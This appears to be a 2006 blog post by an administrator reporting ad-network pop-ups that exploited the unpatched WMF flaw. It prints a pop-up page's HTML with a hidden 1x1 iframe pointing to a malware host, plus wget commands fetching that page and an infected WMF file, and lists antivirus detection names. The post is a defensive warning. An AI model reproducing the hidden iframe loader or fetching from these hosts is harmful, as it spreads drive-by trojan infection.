Jan 1st, 2006. Apparently trojan writers have infected the ad networks with trojans that exploit the unpatched WMF vulnerability. Jan 1st I got my first WMF block alert from Surfcontrol. Per the logs, I saw a user get a pop up; WGET http://www9.paypopup.com/srp99/srp99.htm <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE> srp99 </TITLE> <META NAME="Generator" CONTENT="EditPlus"> <META NAME="Author" CONTENT=""> <META NAME="Keywords" CONTENT=""> <META NAME="Description" CONTENT=""> </HEAD> <BODY> <IFRAME SRC=http://www.srp99.biz/cd/?affiliate=101 HEIGHT="1" WIDTH="1" FRAMEBORDER="0"><IFRAME> </BODY> </HTML> This then linked to load a WMF; wget www.srp99.biz/tape/101.wmf This WMF is infected with Worfo. Also known as Bloodhound.Exploit.56 (Norton), TROJ_NASCENE.GEN (Trend), Exploit.Win32.IMG-WMF (Kaspersky), Exploit-WMF (McAfee), Exp/WMF-A (Sophos), Win32.Worfo, Win32/Worfo!Trojan, Win32/Worfo.Variant!Trojan Per http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=49998 So I'd say watch out world, it's about to get nasty. ACMENEWS.COM LLC